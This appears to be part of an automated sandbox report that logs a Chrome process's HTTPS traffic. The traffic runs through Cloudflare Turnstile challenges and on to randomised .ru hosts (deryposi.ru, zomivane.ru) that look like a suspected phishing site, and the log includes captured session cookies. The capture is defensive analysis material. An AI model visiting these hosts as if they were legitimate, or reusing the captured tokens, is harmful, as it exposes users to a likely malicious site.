                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            CF-Challenge: ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC16384OUTData Raw: 76 5f 38 66 66 63 62 36 61 62 64 61 62 33 37 64 30 36 3d 68 32 47 73 6e 52 79 25 32 62 6a 75 32 30 32 30 6f 32 79 6d 79 75 49 5a 51 49 51 59 79 2d 30 6c 73 4d 32 52 24 30 57 73 75 56 74 71 51 53 2d 30 49 6e 4e 4f 4e 73 47 6a 52 78 57 47 30 68 52 30 52 71 51 37 30 2b 5a 79 4d 30 56 66 30 24 59 30 4b 32 79 46 59 68 7a 52 6d 30 4e 73 30 78 30 6e 73 30 32 75 52 6f 67 47 79 4f 36 49 72 6d 34 73 68 30 58 34 32 79 4e 30 4b 47 30 6b 30 4e 56 46 47 41 69 30 79 69 30 67 73 51 33 67 42 48 52 30 30 75 49 30 51 48 47 30 30 37 75 2d 32 30 6b 69 6a 30 41 73 67 61 74 2d 32 53 66 73 51 67 45 70 53 7a 78 71 74 4b 30 79 47 53 45 2d 6d 7a 62 73 6a 66 37 75 4e 78 6a 48 6d 47 52 74 30 30 34 2d 6d 53 52 68 72 42 31 6e 30 53 7a 46 53 45 6b 58 49 30 4f 6e 55 6c 75 6e 64 68 70 31
                                                                                                                                                                                                                                            Data Ascii: v_8ffcb6abdab37d06=h2GsnRy%2bju2020o2ymyuIZQIQYy-0lsM2R$0WsuVtqQS-0InNONsGjRxWG0hR0RqQ70+ZyM0Vf0$Y0K2yFYhzRm0Ns0x0ns02uRogGyO6Irm4sh0X42yN0KG0k0NVFGAi0yi0gsQ3gBHR00uI0QHG007u-20kij0Asgat-2SfsQgEpSzxqtK0yGSE-mzbsjf7uNxjHmGRt004-mSRhrB1n0SzFSEkXI0OnUlundhp1
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC16384OUTData Raw: 4c 46 4c 47 30 55 66 4e 30 6d 5a 30 6a 79 43 30 55 70 51 5a 68 5a 6d 47 79 54 6e 72 30 49 58 34 51 45 2b 30 72 73 79 49 30 50 30 62 47 30 32 30 4b 6a 6d 5a 30 69 79 2d 30 71 7a 59 49 79 6c 30 4a 78 79 30 30 35 30 43 5a 6d 75 79 6e 30 41 66 79 24 30 38 30 4b 66 79 2b 30 67 58 38 66 41 73 51 6b 30 63 4c 64 46 30 4c 30 31 30 52 5a 30 6f 30 51 30 38 47 79 54 30 55 30 41 52 30 62 30 75 66 38 47 30 71 30 55 4c 6f 24 30 42 30 55 4c 7a 68 58 37 30 46 73 79 46 34 6a 30 2d 66 79 30 79 58 30 38 48 38 73 51 68 30 57 5a 79 32 79 35 30 30 66 52 75 30 6a 30 71 73 79 66 73 70 30 4d 66 6d 2b 30 6a 30 41 66 6d 6d 30 79 30 38 6a 6d 47 30 42 47 6d 30 79 69 79 4c 30 71 73 51 30 79 76 30 61 42 59 47 79 76 30 2b 5a 41 36 34 57 6a 55 73 51 30 30 35 30 6c 30 79 66 73 50 30 57 30
                                                                                                                                                                                                                                            Data Ascii: LFLG0UfN0mZ0jyC0UpQZhZmGyTnr0IX4QE+0rsyI0P0bG020KjmZ0iy-0qzYIyl0Jxy0050CZmuyn0Afy$080Kfy+0gX8fAsQk0cLdF0L010RZ0o0Q08GyT0U0AR0b0uf8G0q0ULo$0B0ULzhX70FsyF4j0-fy0yX08H8sQh0WZy2y500fRu0j0qsyfsp0Mfm+0j0Afmm0y08jmG0BGm0yiyL0qsQ0yv0aBYGyv0+ZA64WjUsQ0050l0yfsP0W0
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1847OUTData Raw: 4e 37 57 69 30 63 78 41 56 66 24 47 6e 6e 58 48 79 6f 4e 65 5a 38 71 53 42 44 42 73 38 44 59 6f 6d 44 30 51 49 30 78 72 67 49 59 72 65 4d 5a 49 44 4a 71 67 6c 30 58 38 36 4a 52 76 5a 72 66 38 48 5a 41 32 61 75 4c 58 4e 43 42 72 4d 6d 2d 65 77 33 34 30 79 42 53 58 73 67 65 2d 6f 46 75 57 65 53 78 6f 51 38 30 63 4a 45 5a 79 4e 30 5a 73 30 79 57 74 41 6e 5a 41 47 7a 54 68 78 4a 43 66 79 77 37 6f 44 68 4c 48 7a 50 6e 4c 58 64 35 35 42 77 63 73 55 51 55 30 63 49 79 67 38 5a 53 34 48 56 38 54 4f 32 46 69 56 36 79 61 5a 46 66 59 6e 48 4d 61 6f 74 75 59 79 4e 66 79 68 34 76 46 53 73 6f 47 41 6d 79 77 30 62 2b 30 67 65 35 77 42 6c 79 50 79 33 5a 6d 73 30 5a 79 71 68 4c 71 51 75 79 68 73 38 47 6d 78 30 48 79 42 42 42 49 30 76 54 74 34 57 49 30 36 6b 33 58 59 79 6d
                                                                                                                                                                                                                                            Data Ascii: N7Wi0cxAVf$GnnXHyoNeZ8qSBDBs8DYomD0QI0xrgIYreMZIDJqgl0X86JRvZrf8HZA2auLXNCBrMm-ew340yBSXsge-oFuWeSxoQ80cJEZyN0Zs0yWtAnZAGzThxJCfyw7oDhLHzPnLXd55BwcsUQU0cIyg8ZS4HV8TO2FiV6yaZFfYnHMaotuYyNfyh4vFSsoGAmyw0b+0ge5wBlyPy3Zms0ZyqhLqQuyhs8Gmx0HyBBBI0vTt4WI06k3XYym
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1308INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 4624
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-out-s: vr39KBL4XpK1k7O+XprH03+Qnw/7au6WcrYmsqwJcAJ6LNpKA8sG/fiWMkeIX92mtXjOIbnTvlsZa4nyAGCohiB/B6qcPxGzOjbQz4+m/gjUM4bqCM3rRVtfJfB38asA7+Z72XJG7poVkSjCsgDCXTxKVtJzlxGVOo9RFI3yaW8tpqWg9CXfmqrKyvIEnUhZplD2D3aF/eItakM5Tb4qHru75C44V2OZMQZhQEWG647RdHUoUSk3xX9mDXGSbtCfqpS2MsN3insW4GrD8fSvHmvXRShrEA6SBxroMJ/550HsvvUyd81tfgKheYkaKfBYWX2Z/ig18r2HCr4inxpK+I42+NGiKb+gETWuIxh+xeS2tIOVyz3uFMvPVQieWFR3zfnlkjqkj9NKI34KO1rBszuFhX30rId8mjTfsVZB1wN3IZVbB6dzeeagpFIAKxSr6gi+9mmhiI03pmxIrBgzCbMznt8aZ6siK69Wm1O3Pzj5lF/f5mJrBgdqUh4uAvbbHaarFbeIZCYSwv66wuNwy/0U8AZtQw7lh5VEOj0tTF5dsgdpgxOpqI4uNsT8lzrBUXxR/N+ZqKE2lRjnDN6ouC3jDGIyyiIY+Nz/LGnOOl35hYYW7ATU7Xw1vkMbhwKB2T9QyA/t1YSeRjl5GUKhuneDwr4vRIR4qldhzzlmHxII4IbBuowBiVFuF+WaRRIxcgYZU2Hyz8nfV351iSHBwyW0zY98cdIBCc72bmCKPJPPxwlD9aXM9M3YISncO2dhdGcy0Wsa4ZtrYhv2liB9OKKP3fq3hFxjMDKBfXnIGRHCER9hqnFRjVXU6PSh9MsMUvC1c4h2kYQpSV3AtTmWLJL4yFf2qkM65S3kFZ6cfu7obZ1WQBFjYoLHzJwbfJoA95NknoynmcTH7LKg2xNifl1V4H5iJKkB3Lun8NdSUpEz2yOWFsaWzEnk0UhX4J2dJ2D7ZqisS0SJf/wprb5TckEh5to9pENjs05MXHLmWNfs/O0bas [TRUNCATED]
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC229INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 53 37 45 62 59 30 76 78 36 4d 4f 31 5a 47 4a 76 45 59 36 56 51 63 4d 48 59 72 58 6d 4d 2b 44 34 4a 78 39 41 6a 4f 30 59 72 73 68 6c 56 77 6f 6e 33 4c 6c 70 69 78 30 56 56 59 37 38 31 61 52 5a 4f 74 68 2f 63 6a 37 61 32 76 64 4e 63 34 4b 43 72 37 79 54 2b 2b 30 4e 38 30 4b 38 49 48 30 48 70 69 79 4b 58 33 74 7a 79 2f 45 3d 24 50 76 56 6e 48 6f 69 66 44 77 39 4f 4c 55 68 51 79 61 71 43 71 41 3d 3d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 64 66 64 66 39 62 63 33 32 66 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: cf-chl-out: S7EbY0vx6MO1ZGJvEY6VQcMHYrXmM+D4Jx9AjO0YrshlVwon3Llpix0VVY781aRZOth/cj7a2vdNc4KCr7yT++0N80K8IH0HpiyKX3tzy/E=$PvVnHoifDw9OLUhQyaqCqA==Server: cloudflareCF-RAY: 8ffcb6dfdf9bc32f-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1201INData Raw: 64 6f 53 59 73 71 79 54 63 37 47 36 76 4d 57 37 78 4d 6d 39 6f 37 58 49 75 38 69 6d 71 6f 79 4f 70 38 54 46 30 61 66 4b 72 4c 71 37 6d 4e 54 57 7a 37 2f 59 79 72 4c 43 75 37 43 30 77 37 37 42 78 64 33 43 78 63 69 38 75 66 50 4c 72 50 54 57 73 64 62 54 78 4d 6a 76 2b 4d 76 5a 7a 50 7a 54 34 63 37 69 31 73 48 6d 38 64 54 5a 78 50 7a 5a 36 4d 63 46 33 4d 33 79 41 75 44 6c 35 64 6e 6c 2b 66 6e 5a 39 66 6b 4d 32 52 6b 53 46 50 34 55 41 67 59 59 35 51 55 4a 2b 67 41 49 36 43 55 54 37 52 4d 79 41 51 55 57 4f 51 59 62 39 43 77 75 47 68 34 43 4d 42 38 68 51 52 67 43 4a 30 6f 56 47 67 51 35 48 79 4d 72 48 44 4e 48 52 46 52 45 4d 54 6c 43 4c 54 4a 4f 48 68 55 66 4f 30 42 4d 4e 31 38 78 48 55 67 6b 49 44 31 48 4f 53 31 4d 4c 56 73 38 63 30 5a 30 52 6c 46 46 55 47 35
                                                                                                                                                                                                                                            Data Ascii: doSYsqyTc7G6vMW7xMm9o7XIu8imqoyOp8TF0afKrLq7mNTWz7/YyrLCu7C0w77Bxd3Cxci8ufPLrPTWsdbTxMjv+MvZzPzT4c7i1sHm8dTZxPzZ6McF3M3yAuDl5dnl+fnZ9fkM2RkSFP4UAgYY5QUJ+gAI6CUT7RMyAQUWOQYb9CwuGh4CMB8hQRgCJ0oVGgQ5HyMrHDNHRFREMTlCLTJOHhUfO0BMN18xHUgkID1HOS1MLVs8c0Z0RlFFUG5
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1369INData Raw: 6b 4d 45 46 42 51 66 42 44 59 5a 49 43 67 4f 54 7a 70 53 43 69 49 74 4d 46 63 6a 4c 79 55 79 47 6a 4d 77 4c 78 6f 57 53 30 6f 77 59 6d 4e 48 4a 42 35 4a 51 6d 74 6f 4b 32 67 73 58 47 70 4c 4d 7a 4d 77 53 30 5a 6c 51 55 59 74 56 47 35 54 66 30 68 68 61 6b 46 4e 65 31 64 51 64 47 52 42 53 48 6c 2f 5a 46 6d 4b 69 6f 35 67 58 57 6d 43 6d 47 35 59 64 56 68 7a 63 48 42 70 58 35 4b 63 63 57 78 66 6e 33 52 78 64 5a 4a 31 70 6f 57 57 65 4a 78 77 6b 58 39 71 62 33 4e 70 70 6d 39 7a 68 6d 36 36 74 63 43 37 6a 61 70 31 64 72 61 45 68 72 57 79 76 5a 57 69 79 6f 6d 63 75 73 4f 37 6a 36 32 67 72 35 65 4b 79 72 43 61 73 70 7a 4c 6c 63 2b 77 34 2b 50 69 78 4a 32 5a 6d 74 71 2b 70 75 71 6a 33 36 36 35 7a 4c 36 6c 79 39 36 6f 72 66 4c 36 37 62 66 72 73 37 76 4d 32 66 6f 42
                                                                                                                                                                                                                                            Data Ascii: kMEFBQfBDYZICgOTzpSCiItMFcjLyUyGjMwLxoWS0owYmNHJB5JQmtoK2gsXGpLMzMwS0ZlQUYtVG5Tf0hhakFNe1dQdGRBSHl/ZFmKio5gXWmCmG5YdVhzcHBpX5KccWxfn3RxdZJ1poWWeJxwkX9qb3Nppm9zhm66tcC7jap1draEhrWyvZWiyomcusO7j62gr5eKyrCaspzLlc+w4+PixJ2Zmtq+puqj3665zL6ly96orfL67bfrs7vM2foB
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1369INData Raw: 73 71 54 52 39 48 50 7a 41 4f 4d 44 78 55 4c 78 55 76 4f 45 6c 49 46 44 74 56 4d 6c 41 67 50 6c 49 68 55 6c 73 64 4a 46 4a 54 4d 31 5a 67 62 69 73 75 63 55 6c 49 58 57 78 31 63 32 4a 69 53 6e 6c 72 64 56 56 34 53 46 39 51 51 6b 39 37 66 6e 4d 2b 58 57 42 62 52 47 47 47 5a 6b 6c 36 54 33 4e 66 66 30 74 79 55 59 4e 6b 63 6c 53 48 63 49 64 59 66 32 6c 69 6d 33 68 65 65 49 4a 30 61 49 64 37 71 58 57 41 68 4b 4b 6b 66 6f 65 73 66 6d 79 69 68 34 4f 6c 70 49 75 62 6b 61 71 66 73 49 43 76 6f 72 57 6a 73 35 4b 79 74 4d 4c 44 6d 70 72 49 71 38 79 39 72 37 4f 4f 73 4b 47 51 7a 4b 79 35 75 61 36 75 34 4d 6d 77 72 4d 44 53 70 4c 47 76 77 65 65 79 74 63 58 62 76 37 2b 2f 71 2b 4b 2f 7a 4d 4f 32 72 76 57 31 79 76 7a 52 7a 64 48 4c 36 72 6a 6a 74 66 50 37 32 63 62 68 33
                                                                                                                                                                                                                                            Data Ascii: sqTR9HPzAOMDxULxUvOElIFDtVMlAgPlIhUlsdJFJTM1ZgbisucUlIXWx1c2JiSnlrdVV4SF9QQk97fnM+XWBbRGGGZkl6T3Nff0tyUYNkclSHcIdYf2lim3heeIJ0aId7qXWAhKKkfoesfmyih4OlpIubkaqfsICvorWjs5KytMLDmprIq8y9r7OOsKGQzKy5ua6u4MmwrMDSpLGvweeytcXbv7+/q+K/zMO2rvW1yvzRzdHL6rjjtfP72cbh3
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC685INData Raw: 74 4b 68 42 54 54 69 30 6b 4c 77 39 5a 57 30 70 54 53 53 73 70 51 42 78 6b 46 6c 63 37 61 42 35 45 58 69 4a 45 54 55 51 35 52 6d 74 47 50 31 35 72 51 6b 46 6d 4f 46 46 45 61 33 4a 52 50 31 68 71 50 6b 35 77 50 33 39 56 58 45 64 37 56 59 6c 32 66 31 75 50 57 57 5a 65 62 49 4e 79 59 47 43 4b 62 35 70 7a 64 47 35 65 64 6e 56 2f 62 70 4b 54 65 4b 65 6b 67 4a 74 71 64 5a 70 6c 72 35 32 71 67 6e 2b 67 61 34 71 47 64 32 39 31 64 6e 4a 38 70 33 56 32 6e 59 36 4e 73 49 53 54 67 38 4b 41 71 35 71 43 69 34 61 61 6d 62 72 53 6e 64 4f 67 6b 64 69 77 6a 37 43 6d 32 72 32 33 72 62 66 53 75 4c 4c 67 6e 4c 36 6b 31 4e 71 2f 74 64 71 6f 76 4c 33 45 37 37 2b 38 76 63 54 73 74 65 57 33 30 37 76 46 30 64 6a 4f 37 4c 76 57 77 39 7a 41 32 4e 44 66 33 65 76 48 39 73 76 66 44 2b
                                                                                                                                                                                                                                            Data Ascii: tKhBTTi0kLw9ZW0pTSSspQBxkFlc7aB5EXiJETUQ5RmtGP15rQkFmOFFEa3JRP1hqPk5wP39VXEd7VYl2f1uPWWZebINyYGCKb5pzdG5ednV/bpKTeKekgJtqdZplr52qgn+ga4qGd291dnJ8p3V2nY6NsISTg8KAq5qCi4aambrSndOgkdiwj7Cm2r23rbfSuLLgnL6k1Nq/tdqovL3E77+8vcTsteW307vF0djO7LvWw9zA2NDf3evH9svfD+


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            137192.168.2.1749856104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC375INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:44 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-out: EpA8KaEMkzmIv1yhMX86nA==$MlaxgomoUUwEw3tZx2UlvA==
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6e4ae084319-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            138192.168.2.1749858188.114.96.34435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:45 UTC649OUTGET /bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC HTTP/1.1
                                                                                                                                                                                                                                            Host: sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://dm9h.zomivane.ru
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:45 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8hml3tsqmYaMeXll0Cz4u9mJYqR3Vet1knA79yLBwPkcLT6%2BIl54be%2BYbdNMwd%2BlVsZSjjQHGsAZKThZRP07YWfM%2BfSqrqPtzoMkQnLRul1rwNH6dl4neXjev0SFXBz0mhJIgJpFJRMVZA384p%2BLQSoB8sE6btCKR6YJFVAz4xSlSz45v3%2B6tB7uH0bc2RLjai%2F1YJ9CoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6e89c9843d9-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1596&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1227&delivery_rate=1829573&cwnd=224&unsent_bytes=0&cid=c63c8da5338deee8&ts=544&x=0"
                                                                                                                                                                                                                                            2025-01-10 12:36:45 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 11
                                                                                                                                                                                                                                            2025-01-10 12:36:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            139192.168.2.1749862188.114.97.34435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:47 UTC443OUTGET /bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC HTTP/1.1
                                                                                                                                                                                                                                            Host: sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:47 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWrhR7fJtD4lPGe5%2FFHCv2DzhV8%2FYHG5K9QSMG2kwLaY8resKutP9g%2F6LPHwC29mogmnZ4F7HHbKO2ThrNhx9w%2F5Ynar%2F50%2FefAZqJnTD%2FTpKOkHhuoqpmWNGinYfA69BdRQVGhWxkWO9HnGA2dYhln1v6FixNqH89hptjG8HUzWUTPmjlHlXuCWEGzBFNWyoSe94HlXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6f2f9c14291-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1705&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1021&delivery_rate=1638608&cwnd=207&unsent_bytes=0&cid=24b7dbc6113f85bc&ts=560&x=0"
                                                                                                                                                                                                                                            2025-01-10 12:36:47 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 11
                                                                                                                                                                                                                                            2025-01-10 12:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            140192.168.2.1749952104.21.96.14435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1377OUTGET /oIZnEw3n/ HTTP/1.1
                                                                                                                                                                                                                                            Host: dm9h.zomivane.ru
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: XSRF-TOKEN=eyJpdiI6Im1WWU12dVloRkxqWGUwaTVoa3VCV1E9PSIsInZhbHVlIjoiTUdCL0xRTXprK0F6K202cHA4enZLR3lkT1lkUEdlRmExL0RiZWtsTkp5Z1FLazVVVSthMUZKSDRyeUNKU3k3Y0p2N2ZpRFlsVEI0TFlNOUxHS1NveXpER3RaaTdoblUvRkdDQzdUamsxWkxhN00yVWFnVC9CU1M0bG9pQUpHWmoiLCJtYWMiOiIzYjg3YjE0MmZiZjYwOTk1ZjFlNjk4ZWU3ODMyOTJmYTQyYzBkMGFhODdjNDc5MzAzY2ZhNjYyNDIzYmNjNDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpNMFRaclpZNGhwT1RyeHkvT3Y2b1E9PSIsInZhbHVlIjoiNndBQXQzby9ESXZHTjFReHdla1dkdWovbmFUWGY0NlJJTGF3L0gybzVxZ3dOZ3lJR3dwcGZpNk5HTEF6bXNmOXlDQ1JHYnlhcVVwZkpJRVVRYlBra3JFSUFkMUViN21DVmFYeUY2YndLQURicUFCbmw0OEZHUjd4bmF2aGpUVjEiLCJtYWMiOiI1OTYzNTU3OTZkNjUyNzIxZGMxODcwNGU4NTY3NjE0NjYzNjA2MWU3MzcwYTZlNTE4ZDNmYzdhZDViOTZhNmY2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                            2025-01-10 12:37:54 UTC1246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
